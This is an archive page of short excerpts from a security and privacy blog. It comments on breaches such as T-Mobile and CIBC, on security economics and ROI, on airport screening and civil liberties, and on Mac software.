I first met David Akin when he was covering Zero-Knowledge Systems, where I worked. David was always insightful, and even when he thought he saw us blowing smoke, he was pleasant about it. So I’m both disappointed and excited to see that he “will join CTV’s Ottawa bureau as a Parliamentary Reporter.” I sincerely hope […]

 

Application Layer Vulnerability, an Orientation Issue

Richard Bejtlich comments on a new “@RISK: The Consensus Security Alert“, which starts: “Prediction: This is the year you will see application level attacks mature and proliferate.” He says: You might say that my separation of OS kernel and OS applications doesn’t capture the spirit of SANS’ “prediction.” You might think that their new warning […]

 

All Good Things Must End

Phrackstaff is pleased to bring you _our_ LAST EVER CALL FOR PAPERS for the FINAL RELEASE of PHRACK. … Since 1985, PHRACK MAGAZINE has been providing the hacker community with information on operating systems, network technologies and telephony, as well as relaying features of interest for the international computer underground. PHRACK MAGAZINE is made available […]

 

CCS Industry Track

I’m excited to be a part of the ACM’s 2005 Computer and Communication Security Conference, which has an Industry Track this year. We’re working to foster more interplay and collaboration between industry, the public sector, and academia: The track aims to foster tighter interplay between the demands of real-world security systems and the efforts of […]

 

Secure Programming

Dave Wheeler has a new article out “Call Components Safely.” Developers should take a few minutes to read it.

 

"Just the Standard Rhetoric"

…Iran’s supreme leader, Ayatollah Ali Khamenei, told Muslims making the annual pilgrimage to Mecca that Rushdie was an apostate whose killing would be authorised by Islam, according to the Iranian media. How very reassuring and level-headed of the British to respond by saying: The Foreign Office said: “The key thing from our point of view […]

 

Software Security: What's Your Next Move?

I met Gunnar Peterson after attending one of his talks at BlackHat. It was very well done, and it looks like he’s now offering longer versions. If you’re concerned about the security of your software, and want to improve your development process, you should consider this. If you produce software, and aren’t concerned about the […]

 

Rob Slade Ben Rothke Writes a Positive Review (Forensic Discovery) [Ooops!]

Rob Slade reviews security books. No, more generally, Rob Slade points out in excruciating detail the flaws in security books. So when he I misread a post from ISN and think it says Slade, rather than Rothke, I look like a real fool who can’t find the flaws in my own writing. Really, Ben Rothke, […]

 

Small Bits: Secret Law and Security, Root-Fu, New Blog, and Canadians Stagnate

Cory Doctorow points to a letter he’s sent American Airlines about: The security officer then handed me a blank piece of paper and said, “Please write down the names and addresses of everyone you’re staying with in the USA.” and his Kafka-esque experience in trying to find out why they were asking. Good on Cory […]

 

Attackers Are Evolving, Are You?

When I was getting into computer security, back in the dark ages, when Nirvana was releasing albums, hacking was an art. It was passed along in hard to find text ‘philes’, which were a mixture of technology and philosophy. 2600 Magazine remains an example of this sort of old-school hackerdom. The world-view that accompanied the […]

 

Why I Want HTML Export (from Keynote)

Lately, I’ve been complaining that Keynote still can’t export to the web. Now, I’ve been remiss in ensuring all of my writing is in HTML. I’ve been slowly going back and converting things, as I have a few minutes, or as I want to link to something I’ve said. Today, in posting a comment to […]

 

"Thinking WiKID Thoughts"

Nick Owen has a new corporate blog up. His very first post is “Why ROI is a crappy measure for Information Security.” I look forward to more.

 

Canada, Land of Rugged Individualists?

Well, for the sake of our non-Canuck visitors, a brief primer is in order. The post 1960’s Canada can be better described as Trudeaupia – a progressive-era dream that just kept on chugging along. The stage in our history where good liberals had become bad Liberals and were well past the point of no return. […]

 

Small Bits of T-Mobile

A friend wrote to T-Mobile and asked if his data was compromised in the T-Mobile break-in. A service droid sent him a press release. My comments are pointed to by the brackets. Customer, Please see the press release below regarding the hacker investigation with T-Mobile’s customer information. If your information was compromised you would have […]

 

Symposium on Usable Privacy And Security CFP

The Symposium on Usable Privacy and Security will be July 6-8 at CMU: The Symposium on Usable Privacy and Security (SOUPS) will bring together an interdisciplinary group of researchers and practitioners in human computer interaction, security, and privacy. The program will feature refereed papers, tutorials, a poster session, panels and invited talks, and discussion sessions.

 

Small Bits of Chaos

The Globe and Mail has a good story on how copyright law is preventing the re-release of “Eyes On the Prize:” The makers of the series no longer have permission for the archival footage they previously used of such key events as the historic protest marches or the confrontations with Southern police. Given Eyes on […]

 

Mac Software Updates

Devosquared has a new release of PowerCard. If you need project management, check this out. It fixes a “bug” where you couldn’t mark days as “weekend.” As a startup person, I’m not sure why that needed fixing, but maybe it matters. Apple has announced a new release of Keynote, which still can’t export to the […]

 

The Iron Fist and the Orange Revolution

There’s a fascinating and moving article in the New York Times about how elements of Ukrainian intelligence aided Yushchenko in his bid to overturn the first, fraudulent election: Whether the collaboration was a convergence of political aims, or a pragmatic understanding by the siloviki that Mr. Yushchenko’s prospects were rising, is subject to dispute. Yulia […]

 

Trouble with Surveying Cybercrime

In a comment yesterday, Chris Walsh said: In any case, this should not be a difficult nut to crack, in principle. The US government conducts surveys of businesses all the time, and is capable of obtaining quality samples and high response rates in which academics justly have confidence. In theory, I agree with Chris. In […]

 

Students for an Orwellian Society

These heroic students have made many sacrifices in the name of IngSoc. They stand as a stirring example to us all. They have denounced the crimes of Davis Sos, who promised over 100 IngSoc posters, but have shirked their duty, and squandered the money provided to them. Those students are now hard at work being […]

 

DHS to Survey Cybercrime

In what they hope will become the premier measure of national cybercrime statistics, officials at the Homeland Security and Justice departments plan to survey 36,000 businesses this spring to examine the type and frequency of computer security incidents. This is a really exciting development. DHS seems to be taking a good approach, and in a […]

 

Giving New Meaning to "You Can't Get There From Here"

Microsoft MapPoint helpfully suggests this scenic route from Haugesund, Rogaland, Norway to Trondheim, Sør-Trøndelag, Norway, when asked for the quickest. This route may well be the quickest that includes England, France, Belgium, the Netherlands, Germany, Denmark, and Sweden. James Tyre (who credits David Flint) told Eugene Volokh.

 

More on DNA Dragnet

Chapell nails the “why you might have nothing to hide, but hide anyway” angle: Even more troubling is the possibility that the person whose DNA was inside this woman may very well have had nothing to do with the crime. But rest assured, that won’t matter to the hundreds of police, FBI, press, and other […]

 

More on TMobile

The LA Times has a story on Jacobsen, the hacker, and the AP has a story with more technical details. The Infosec Potpourri blog has some analysis of the AP story.

 

Model Checking One Million Lines of C Code

Hao Chen, Drew Dean, and David Wagner have a paper of that name in Proceedings of the 11th Annual Network and Distributed System Security Symposium (NDSS), pages 171–185, San Diego, CA, February 2004. Hao Chen’s papers page has powerpoint, PDF and PS, as well as this abstract: Implementation bugs in security-critical software are pervasive. Several […]

 

On Torture

The New York Times reported yesterday that the White House fought for the CIA’s right to torture. In a letter to members of Congress, sent in October and made available by the White House on Wednesday in response to inquiries, Condoleezza Rice, the national security adviser, expressed opposition to the measure on the grounds that […]

 

Small Bits of Chaos

Scrivner points out a basic lack of agreement amongst the pundits: Damn that Bush, cleverly whipping up this fantasy of a threat to scare people into voting for him. … Damn that Bush, ineptly bungling America’s defense against the most dangerous threat Ian has a post about Ron Paul trying to ban the government issuance […]

 

What Makes Good Science?

Over at the Volokh conspiracy, Jim Lindgren writes: Crichton then describes scientific consensuses that turned out to be wrong. I don’t think that there is anything wrong with talking about the consensus of scientists or social scientists (and I certainly do so myself), but one must remember that it is the quality of the evidence […]

 

Financial Cryptography

The conference, not the blog, is now accepting registrations. The program looks really good this year.

 

Hotel Rwanda

I saw Hotel Rwanda this weekend. It’s a true story of a hotel manager who saved over 1,000 people from genocide. If you’ll allow me a moment of disgusted sarcasm, I look forward to the sequel, Hotel Darfur, now in pre-production. The story is the same: No one is bothering to intervene in African genocide, […]

 

T-Mobile

A sophisticated computer hacker had access to servers at wireless giant T-Mobile for at least a year, which he used to monitor U.S. Secret Service e-mail, obtain customers’ passwords and Social Security numbers, and download candid photos taken by Sidekick users, including Hollywood celebrities, SecurityFocus has learned. … T-Mobile, which apparently knew of the intrusions […]

 

Blog Spam

Stefan Geens has a long post on why SixApart’s TypeKey system is not a good solution to blog spam. He points out that the system has bad economies of scale: Here too, the spammer needs to sit down, get a key, pretend to be human for a minute and behave until he gets a comment […]

 

Penny-Wise, Pound-Foolish?

The Supreme Court has just heard a case, Tenet vs Doe, over promises allegedly made to spies: Two former Soviet-bloc diplomats recruited to spy for the CIA during the Cold War say the agency later reneged on promises to compensate them for the dangerous missions they performed.  The husband and wife team are bringing this […]

 

DNA Dragnets and Criminal Signaling

In responding to my comments about Truro’s DNA dragnet, with a fascinating discussion of signaling, Eric Rescorla writes: Even if they’re not the perp, they may have other reasons not to have their DNA collected–for instance they’ve committed another crime that their DNA might match to. (The police say they’re only going to use the […]

 

Private Lives and Psychology

“In a very deep sense, you don’t have a self unless you have a secret, and we all have moments throughout our lives when we feel we’re losing ourselves in our social group, or work or marriage, and it feels good to grab for a secret, or some subterfuge, to reassert our identity as somebody […]

 

Threatcode

In a post to the patch management mailing list, Jay Woody mentions Threatcode, a site dedicated to tracking and shaming badly written code. Cool! I wish the site was a little easier to read, but nice going!

 

Safari

The “back” button in Safari is way too close to the “close” button. Safari would be a much better browser if there was an option to not close (or confirm closing) the window if there are multiple tabs open. Bugger it!

 

Ban Windows, Not Cell Phones

Scrivner has another great post, this one pointing to a study at Virginia Commonwealth University. (My link is to the study, not the press summary Scrivner links.) The press summary claims that rubbernecking accounts for 16% of accidents, looking at scenery or landmarks 10%, while cell phones account for only 5%. Clearly the answer is to […]

 

DNA Dragnet

The city of Truro, Massachusetts is trying to collect DNA from all 790 residents to solve a crime, reports the New York Times. It's not clear why they believe that residents are more likely to be the criminal than non-residents, and it is clear that they don’t get the 4th amendment, against dragnet searches, or […]

 

Economics of Price Discrimination

Scrivner points out that the airlines, masters of price discrimination, are giving up: In response they’ve become perhaps the world’s most expert practitioners* of price discrimination, mastering the art of charging the business traveler $1,000 more than the tourist in the next seat in exchange for a short-notice booking with few restrictions. But even that […]

 

Does Ryan Singel Need A Privacy Policy?

Yesterday, I commented that Ryan Singel, in his review of Robert O’Harrow’s* new book, had an Amazon tracking URL. I was mostly noting the irony of aiding tracking in a post titled “Pay Cash for This Book,” but Ryan comments: “it got me to thinking that this site has no privacy policy.” Not to pick […]

 

Framing Effects and Apple

Until I read John Gruber’s latest Daring Fireball on “The Rumor Game,” I was firmly in the “Apple is being Ridiculous” camp, and “Apple is chilling free speech” camp. The essence of the story is Apple is suing a rumors site because they’re leaking product details. What Gruber points out, and a quick Google search […]

 

Presentation of Risk

The Wall Street Journal posted this table today, in an article on how risks are presented. Note the lack of a time scale. Is that a lifetime risk of a heart-attack? Are there lifetime stats for Vioxx takers? How does that risk compare to the risk of winning the lottery? Those odds are (I’m guessing) […]

 

Small Bits of Chaos

Ryan Singel reviews Robert O’Harrow’s new book, No Place To Hide. O’Harrow covered the CAPPS-II and other privacy stories for the Washington Post. In the spirit of the story, I’ve left the little tracking bits from Ryan’s Amazon URL. If you’d like a less tracked version, click here, or type the title into Amazon. There’s […]

 

Help! Mac Project Management Software

I need project management software for a small project (20-50ish tasks, 8-10 people come and go and need to be assigned tasks.) I’d like software that will assign resources to time blocks, handle dependencies, and be easy to use. I’ve spent the morning testing apps, going until I found something either I or the software […]

 

Boyd's Relevance Today

In a comment, Ian Grigg asks, “I haven’t got to the modern stuff yet, so quite what he has to say that is currently relevant eludes me for now.” Over at Defense and the National Interest, there’s an article that draws heavily on Boyd: In a new briefing [1.7 MB PPT], three retired officers—each hailing […]

 

Disclosure

Adam Laurie and company continue to not release code for their Bluetooth attacks, and vendors continue not to fix them. Are we better off, with millions more Bluetooth devices out there? Do we expect that there will be no release of code, and that without POC code, we’re safe? Bluetooth is different from internet vulns, […]

 

Small Bits of Chaos

Ed Felten announced a “Clip Blog,” of short articles with no or small comments. Hmmm. Neat idea. Ian Grigg gives us his thoughts on the Abagnale controversy: [Clausewitz] said something to the extent of “Know yourself and you will win half your battles. Know your enemy and you will win 99 battles out of a […]

 

Boyd

John Boyd was arguably the best fighter pilot in American history. While at the Air Force Fighter Weapons School, he was not only undefeated, he won every fight so fast he was known as “Forty-Second Boyd.” While there, he wrote the “Aerial Attack Study,” which transformed the study of fighter combat from an art […]

 

Educated Pat-Downs

Eric Rescorla has two good posts on screening at Educated Guesswork. I’d still like to expand the range of questions, and ask, is intense personal screening effective or needed? Can we use air marshals, different aircraft designs, and armed pilots so that we don’t need to compare rub-downs to millimeter-wave xrays?

 

Small Bits of Chaos

Much as I hate blogging anything from Slashdot, Why the Space Station Almost Ran Out of Food is great. (The previous crew had permission to borrow the current crews’ food, but didn’t record how much they’d eaten.) Maybe they could get jobs working for the Social Security administration. John McWhorter has a new book out, […]

 

Evaluating Security

The study, published in the January issue of the journal Emerging Infectious Diseases, concluded that the estimated $7.55 million spent on [SARS] screening at several Canadian airports failed to detect one case of the disease. … “Sometimes what seems like a reasonable thing to do doesn’t turn out that way,” the report’s lead author, Dr. […]

 

370,000 Absconders

Buried in this story about tracking illegal immigrants is the interesting item that as of early 2003, of 6,000 Muslims who absconded within the US after being told to leave the country, only 38 percent had been found. That left over 3,500 still at large. How many have been caught since then? Where are the […]

 

Ratty Signals

So, we have a security signal that’s available, but not used. Why might that be? Is the market in-efficient, or are there real limitations that I missed? There are a few things that jump to mind: Size of code issues. More code will produce a longer report. Rats produces a line count, but doesn’t issue […]

 

Jihad Watch: Muslims claim unfair treatment at Canadian border

I’ve been debating if I should respond to this idea of unlimited searches of Muslims again, and realized that there’s a perhaps interesting analogy. JihadWatch quotes an AP story BUFFALO, N.Y. — An Islamic civil rights group Wednesday accused U.S. border agents of religious profiling after dozens of American Muslims were searched, fingerprinted and photographed […]

 

Quick Links

Cory points to another example of anti-consumer activity, this time Apple disabling the high quality audio-in on the iPod. How to fix it at Hack-a-day. Also via Hack-a-day is the paper Enigma machine. Scrivner discovers that Uncle Sam admits to cooking the books, in a way that the SEC would never tolerate from a public […]

 

Cory vs DRM

Cory Doctorow posts a delicious rant against Wired’s review policy here. Unfortunately, he fails to stress what I think is the key point. Wired is writing reviews. Those reviews are supposed to be impartial. Whatever you may think about DRM, it is clearly an important mis-feature of a product which you may buy. Informed reviewers, […]

 

Congratulations to Mozilla

I’ve always believed that my readers are smarter and better looking than average, and now I have proof. Yesterday, for the first time, over half (50.3%) of the visitors to this site were using Mozilla or Firefox. (As summarized by AWStats.) Browsers / Grabber / Hits / Percent: Mozilla, No, 10308, 31.4 %; Unknown, ?, 9786 […]

 

Quick Links

John Robb has an article at Global Guerrillas about the cost of terrorist attacks and their impact on the economic equilibria at work in cities, based on a report by the NY Fed. A terrorism tax is an accumulation of excess costs inflicted on a city’s stakeholders by acts of terrorism.  These include direct costs […]

 

More on ROI

You can get ROI from security solutions by automating manual processes. Patch management and automated password resets are two solutions that don’t need “incidents” to gain a return. says Pete Lindstrom, responding to my comments that: Well, of course. ROI has enormous problems, including an assumption that technology works out, that there’s an infinite pool […]

 

Biased Reporting

News.com has an article entitled “Craigslist costing newspapers millions.” Which is nominally accurate, but a better title would be “Craigslist saving consumers millions.” Craigslist, which generates more than 1 billion page-views each month, also has cost the newspapers millions more in merchandise and real estate advertising, and has damaged other traditional classified advertising businesses, according […]

 

Talking is Tough

Anyone who talks to journalists to provide background or commentary says things that they wish they hadn’t. This is in contrast to when you’re making news, and can plan what you want to say, and it’s easier to stay “on message.” Kudos to Bruce for owning up to it. I’m sure I said that, but […]

 

Yushchenko!

With Yushchenko at 52% of the votes to Yanukovich’s 44%, it seems likely that Yushchenko will be the next leader of the Ukraine. Congratulations to all who stood up for a fair and honest vote. Oh, and it means I can get a nicer stylesheet in place, too.

 

Froomkin 1, Treasury 0

Michael Froomkin sees the idea of the secretary of the treasury investing the social security trust fund, and finds it wanting.

 

The Intent of a Tank

“We used to talk about the intent of a tank,” Colonel Thomas explained in an interview. “If you saw one, you knew what it was for. But the intent of electrons – to deliver a message, deliver a virus, or pass covert information – is much harder to figure.” Ian Grigg points out an interesting […]

 

Database Flaws More Risky Than Discussed

Rob Lemos has an article in CNET about NGSSoftware. On Thursday, they released a slew of advisories about Oracle products with flaws NGS had discovered 3 months ago. Now, it turns out that the problems may be more risky than thought. Alternately, the release of the exploit code may have caused SecurityFocus to raise its […]

 

Keynote can't Export to Web?!?

I was just playing with Keynote, working on some slides for Shmoocon, when I realized that I couldn’t get my slides onto the web! Now, I’ve griped about how Powerpoint makes its slides for the web, but at least it makes them. It seems that Tim Bray figured this out a while ago, but I […]

 

Good Luck To Ukraine!

I hope that your elections go smoothly, fairly, and peacefully, and that when they’re done, the people’s will is respected.

 

Winning the Battles, Losing the War

A historian, Isaiah (Ike) Wilson III, Ph.D, gave a talk a few months ago at Cornell, entitled “Thinking Beyond War: Civil-Military Operational Planning in Northern Iraq.” His basic thesis seems to be that, in contrast to a carefully planned and executed war campaign, there were no definitive plans for what to do after the Iraqi […]

 

Banks issue 2 factor auth

There’s a story in today’s CNET about banks issuing authentication tokens (like SecurID cards) to customers to address customer authentication issues. While these are useful, insofar as they will make phishing harder, they won’t stop it. Phishing will transform into an online, at-the-moment crime, which will be easier to catch, but work by […]

 

More on SSNs and Risk

In writing about Delta Blood Bank earlier today, one of the issues I was thinking about was the unnecessary use of social security numbers, and how it’s an industry standard. One area where this is particularly evident is in the bifurcated market for cell phones. At one end are providers like Virgin and MetroPCS, who […]

 

Delta Blood bank

Delta Blood Bank sent a letter Friday to donors, warning them a computer that held their personal information had been stolen and advising them to take steps against identity theft and credit card fraud. … In addition to the letter…The blood bank will no longer require Social Security numbers from its donors… No longer require […]

 

TSA Backs Down

Starting today, the federal Transportation Security Administration is telling its screeners to keep their hands to the “chest perimeters” of women unless handheld metal detectors beep when waved over their breasts. I’ve mentioned outrage at TSA intrusiveness in the past. (From Boston.com, via CSOOnline.)

 

Ripping into ROI

Over at TaoSecurity, Richard Bejtlich writes: ‘ROI is no longer effective terminology to use in most security justifications,’ says Paul Proctor, VP of security and risk strategies for META Group… Executives, he says, interpret ROI as ‘quantifiable financial return following investment.’ Security professionals view it more like an insurance premium. The C-suite is also wary […]

 

Anti-American Nuts Unfairly Accuse Military of Torture

[DOD interrogators presented themselves as FBI agents and…] These tactics have produced no intelligence of a threat neutralization nature to date and CITF believes that techniques have destroyed any chance of prosecuting this detainee. If this detainee is ever released or his story made public in any way, DOD interrogators will not be held accountable […]

 

The problem(s) with ID cards

Europhobia nails the link between privacy and economics in the UK imposes national ID cards stupidity: But usually what gets them is “what? I’ll have to pay eighty-five quid for this thing?” No, Europhobia, they’ll have to pay 85 quid for the card, and another 10 quid in taxes for the backend database. (Figuring 60% […]

 

Mac Sysadmining: Find missing man pages

After upgrading to Panther and installing X-Tools, several people complained that some unix man pages, specifically section 3 (standard library), are missing. For example, if you try: % man 3 strcmp and get no man page, you need to follow the procedure below: Remove /Library/Receipts/BSD.pkg/ (rename or delete). Insert Panther CD 1. Install BSD package from […]

 

Effects of democracy on health

The British Medical Journal has just published a study showing either that democracy makes you live longer, or living in a dictatorship kills you, by three Spanish professors.

 

Not Just A Good Defense

Michael Froomkin comments: We vastly overestimated the speed with which non-techies would take up the toys; the growing and enduring dominance of one software platform that didn’t take up the toys; and especially the ability of the empire to strike back via both tech (trusted user) and law (DMCA and worse). Some time about four […]

 

What Did Fox TV Know and When Did They Know It?

Scrivener has an interesting post about an episode of ‘Family Guy’ that shows Osama bin Laden bypassing airport security with a song and dance routine. “This was all quite amusing in 2000. Does it mean anything in retrospect? You decide.”

 

Econ and Security papers

Ross Anderson has added three papers to his Economics and Security Resource page: Fetscherin and Vlietstra’s DRM and music: How do rights affect the download price? shows that the prices of music tracks sold online are mostly determined by the rights granted to the purchaser – including the right to burn, copy or export the […]

 

Three By Froomkin

Michael Froomkin has three nice posts today. First, Inside The TSA, we learn that power tends to corrupt: This account of the goings-on at the MIA TSA branch, brought to you by the feisty local Miami New Times, is worse than not pretty. It’s pretty ugly: allegations of theft from passengers’ bags, sexual harassment (of […]

 

Good Old Fashioned Cooking

Julie, formerly of the Julie/Julia project, has an article in Archaeology on how to cook like the ancients. There are also recipes. Unfortunately, Mongolian Lamb Liquor is (as presented) less interesting than it sounds. (Via Samablog.)

 

First They Came For The Jews

The normally insightful JihadWatch writes: It sounds terrible: restricting their civil liberties. Until you read into the story and find that they’re talking about registration, profiling, and monitoring of mosques and Islamic organizations. Horrors! Registration may inconvenience some people, but after all, a lot of people were inconvenienced on 9/11; as with all these measures, […]

 

People Will Sign Anything

Doug Barnes has a great receipt on You Must Be Present To Win. [Update: Gosh, I wish I’d said something insightful here. Stay a minute, read the rest of my ramblings!]

 

Releasing Criminals

My friend Sameer takes issue with my hoping for experimentation by criminals, on two grounds: First, he believes I’m encouraging violence. This wasn’t my intent. I assume that there are all sorts of ways to non-violently behave badly, from calling a guard snookums to having a tattoo needle in your cell. However, I don’t know. […]

 

How Much Is Risk Management Worth?

David Akin blogs that Fitch Ratings has purchased Toronto’s Algorithmics for $175M (the press release is datelined New York, so I’m guessing that’s a US dollar figure). Algorithmics makes risk management software, focusing on market risks for banks, things like hedging strategies and BASEL II compliance (based on a quick read of their site.) So […]

 

A good day for liberty

In its powerfully worded decision, the [UK Law Lords] said that the government’s “draconian” measures unjustly discriminate against foreigners since they do not apply to British citizens and constitute a lopsided response to the threat of a terrorist attack. (From The New York Times, see also the BBC or Volokh.) WASHINGTON (AP) — A [US] […]

 

Clever criminals

Over at Marginal Revolution, Alex Tabarrok quotes a letter from an inmate: [Inmate:] A privately owned and publicly traded company like CCA has no incentive to rehabilitate criminals.  It is in the best interests of the company for even more criminals to exist.  Unfortunately, the same is true of government run prisons.  And contrary to […]

 

Quickies

Scriviner.net has an interesting article about taxes and your phone company. Any article that starts with an error about how long ago the Spanish American war took place is a little worrisome, but I love watching badly written law becoming irrelevant. Stefan Geens has a great article taking a simple question and exploring the math […]

 

Browser privacy from the server?

A friend writes and asks: I’m working in NYC now, as the Web Admin for Safe Horizon. We’re the largest service agency in the US for victims of violence, crime or abuse. We’re interested in putting in some features into our site, but we have to protect our visitor’s privacy, since they might be visiting […]

 

Signalling by Counting Low Hanging Fruit?

I’ve been thinking a lot about signaling software security quality. Recall that a good signal should be easy to send, and should be easier for a higher quality product. I’d like to consider how running a tool like RATS (link) might work as a signal. RATS, the Rough Auditing Tool for Security, is a static […]

 

Referrer spam: The end is ROI

The first two claim to be UNDER CONSTRUCTION, and this makes me hypothesise that they are honeypots of a sort, respectively researching whether Deep-URLs (“/friendslinks.php”) or merely Root-URLs (“/”) are the most effective methods of Referrer-Spamming, plus also providing a check to see which blogs are the most valuable ones to be worth spamming. In short: […]

 

Welcome, Carnival readers!

My friend Rob Sama is hosting this week’s Carnival of the Capitalists, and was kind enough to give me a shout out. So, welcome if you’re coming in from there. I’m traveling on business, so blogging will be a little slow, but please, have a look around! I try to apply economics to security problems […]

 

State Failure 101

Global Guerrillas has a great post on how US efforts in Iraq are broken: Unfortunately, the US effort to rebuild Iraq is out of synch (a full 180 degrees) with what is really needed. If we map US efforts to Maslow’s hierarchy we see something quite unsettling.

 

Two on Liberty

Ed Hasbrouck has a long post on the impact of the new “intelligence reform” bill on privacy and liberty. The CBC has an article on Australia imposing random drug tests on its consumer-units, or citizens, or something.

 

Strictly Off The Record…

Nikita Borisov and Ian Goldberg have released Off-the-Record Messaging, an IM plugin for private communication providing not only the usual encryption and authentication, but also deniability and perfect forward secrecy. Deniability avoids digital signatures on messages (while preserving authenticity and integrity), so there is no hard-to-deny proof you wrote anything in particular; in fact, there […]

 

Be Careful What You Wish For, Air Force

Federal Computer Week has a story about the Air Force’s efforts to patch faster: Officials’ ultimate goal is to have software patches implemented across the Air Force in minutes. During the next few months, they hope to cut the time from tens of days to just days, said Col. Ronnie Hawkins, director of communications operations […]

 

Mac toys

Chibineko.org has a nice page of software for techies switching to a Mac. Speaking of techie Mac use, I’m playing with subversion and the sweet looking SCPlugin. To make it see my ssh keys, I’ve added SSHkeychain. That required logging out and back in. After I did, I was getting lots of Keychain errors. It […]

 

CIBC & SB136

CIBC is a Canadian bank, who has recently been sued by a West Virginia scrapyard operator for faxing their customer’s private data to him. I’ve blogged about them here and here. (It turns out that other banks are doing the same thing, as David Akin blogs.) SB 1386 is a California law that requires companies […]

 

BarlowFriendz: A Taste of the System

John Perry Barlow writes about the apparently limitless suspension of the Constitution that’s already happened in airports. But randomly searching people’s homes against the possibility that someone might have a bio-warfare lab in his basement would reveal a lot of criminal activity. And it is certainly true that such searches would reduce the possibility of […]

 

Thoughts on Kerik's withdrawal

Kerik issued a statement saying: “In the course of completing documents required for Senate confirmation, I uncovered information that now leads me to question the immigration status of a person who had been in my employ as a housekeeper and nanny,” he said. “It has also been brought to my attention that for a period […]

 

Kerik Withdraws

The BBC is reporting that Kerik has withdrawn, citing personal reasons. The BBC also mentions controversy over his link to Taser, Inc, and a possible nannygate issue.

 

Google Groups, Privacy and Spam

Writing to Farber’s Interesting People list, Lauren Weinstein writes: Their new system is obscuring *all* e-mail addresses in *all* netnews messages in the archive (including the vast numbers of messages that do not originate within the Google environment and/or that predate the existence of Google Groups). This includes not only the addresses of individual netnews […]

 

Optimizing acceptable bugs?

In a recent comment, Pete Lindstrom asks: So do you think this can be modeled using a version of the El Farol’s Bar you post about in the future? Maybe we can optimize the number of acceptable bugs… How does/should the policies of Microsoft and Oracle affect this model? I’ve been thinking about this, and […]

 

To sleep, perchance to sleep?

After installing Apple’s latest security update, my laptop no longer goes to sleep when I close it. Is anyone else with more time experiencing this? I am using Bernhard Baehr’s excellent Sleepwatcher, a daemon that allows you to add sleep and wakeup actions, but that hasn’t changed in a while. (If I had more time, […]

 

What Sci/Tech books are worthwhile?

Ed Felten writes about a library survey in which few tech books, and none worthwhile, made the top-1000 list. He concludes: It’s the technology books that really disappoint. These books are useful, to be sure, and it’s not surprising that libraries have them. What’s really sad is that no book about the intellectual content or […]

 

What cost security?

For traditional financial services alone, compliance with the PATRIOT anti-money laundering provisions is projected to cost $10.9 billion by the end of 2005, according to the research firm Celent Communications. No wonder that the champions of forced business spying didn’t want to present even this watered down procedure for congressional review, says banking industry consultant […]

 

Mac debugging

Daring Fireball points to a new Apple technote full of ways to debug programs under MacOS X.

 

Nobody goes there anymore, it's too crowded

In 1994, Brian Arthur introduced the ‘El Farol Bar’ problem as a paradigm of complex economic systems. In this model a population of agents have to decide whether to go to the bar each Thursday night. All agents like to go to the bar unless it is too crowded (i.e. when more than 60% of […]

 

Destroying the airlines in order to save them

My friend Dave writes about trains vs. planes: On that topic, it’s not hard to make a point that train travel is really not far behind airline travel. For me, it was 45 minutes to the station, only 10 minutes to checkin and board, 7.5 hours to DC in a comfy seat (with 120v power […]

 

Code analysis and safe languages

Ekr writes: These tools aren’t perfect and it certainly would be nice to have better tooling, but it’s worth noting that a lot of the bugs they find are the kind of thing that could be entirely eliminated if people would just program in safer languages. For instance, the buffer overflow vulnerabilities which have been […]

 

Privacy lessons from CIBC

The disaster over at CIBC is telling, and bears a little exploration. The real victims, whose details were faxed, never saw the violation of their privacy. It was CIBC tossing data around incompetently, all the while publicly proclaiming their commitment to privacy. Wade Peer, a scrapyard operator in West Virginia, brought the three years […]

 

Eating their own dogfood

In a move that surprises no one, the screensaver that Lycos created to target spammers has been used to target Lycos. The screensaver was designed to launch a DoS attack against sites that are known for their spamming techniques. (From Chris Richardson at SecurityProNews via Mort. See the ZDNet UK article for more details.)

 

Cool bug!

I believe this is a bug in Netnewswire, and will be reporting in there in just a second, but it’s so pretty I wanted to share it. Note the menubar has gone transparent, but is still readable. It looks way cool this way. Maybe someone will find a hook in the OS to allow us […]

 

Canadian privacy law & CIBC

Businesses can avoid potential public relations and legal nightmares by developing privacy policies, authentication processes and using cutting-edge technology. The Canadian Imperial Bank of Commerce learned this the hard way last week when U.S. scrapyard operator Wade Peer went public with his story about how one of Canada’s largest banks was flooding his fax machine […]

 

oooh, look an unscientific poll!

Go tell the pollsters that we’ve had enough government sponsored groping. [Update: You may use BugMeNot for a login, or you might want to create a new one for the poll, and feed the bugmenot database.]

 

Kerik for DHS?

The New York Times is reporting that Bernard Kerik, formerly of the NYPD, has been tapped for homeland security secretary. [Update: VikingZen has an alternate suggestion that shouldn’t be missed!] [Update 2: Declan has found a more relevant set of links than I did. Thanks to Secondary Screening.]

 

The metrics quest

There’s an interesting article on metrics over at CSO Online. The comments are great, too. Now if you’ll excuse me, I need to go ring a gong.

 

Freedom to travel in Ukraine

This information has been confirmed by another listener. She said that in ticket sales offices on Hnatyuk street in Lviv the cashier was extremely friendly to those who were traveling to Kiev, but she did record the passport data into some sort of catalogue. Maidan-INFORM has been stressing that such practice of registering movement of […]

 

Training is not the answer

Florence Olsen writes in Federal Computer Week about security training: Last year, for example, officials at a federal financial institution tested employees’ adherence to the agency’s computer security policy against opening e-mail attachments from unknown sources. About half of the employees failed the test, Coe said. [Kathy Coe, regional director of educational services at Symantec] […]

 

The death of marketing…

John Lebkowsky comments that he’s being paid to blog by “Marqui.” The first two headlines on their web site sum it all up: MARKETING IS IN A STATE OF CRISIS! Watch the demo (5 minutes) I have to spend 5 minutes figuring out how you distinguish yourselves as a marketing company? Sheesh.

 

Financial Cryptography: 2005 – The Year of the Snail

Ian Grigg is on a roll with good posts. See this: 2005 – The Year of the Snail. Since he’s doing the thinking, and I haven’t had my coffee yet, I’ll just ask, what happens when this gets 10x worse? Is there anything acting as a serious brake to that? Also, Ian says “serious money” […]

 

Amateurs study cryptography; professionals study economics.

Ian has a fine post over at financial cryptography: The only thing I’m unsure of is whether it should be economics or risk. But as I roll it around my mind, I keep coming back to the conclusion that in the public’s mind, the popular definition of economics is closer to the image that we […]

 

Worms swamp security

Security experts take it as a truism that you can’t defend everything. So you have to make choices about what attacks to worry about, and which ones to ignore. A study released today claims that unprotected hosts are attacked once per second. (USA Today reports on the study, and avantgarde.com is utterly swamped. So I […]

 

Lycos' attack spammers@home

I’d like to add one bit about Lycos’ new attack spammers screensaver. Ed Felten writes most of what needs to be said about it: This is a serious lapse of judgment by Lycos. For one thing, this kind of vigilante attack erodes the line between the good guys and the bad guys. Spammers are bad […]

 

Paralyzed woman walks again

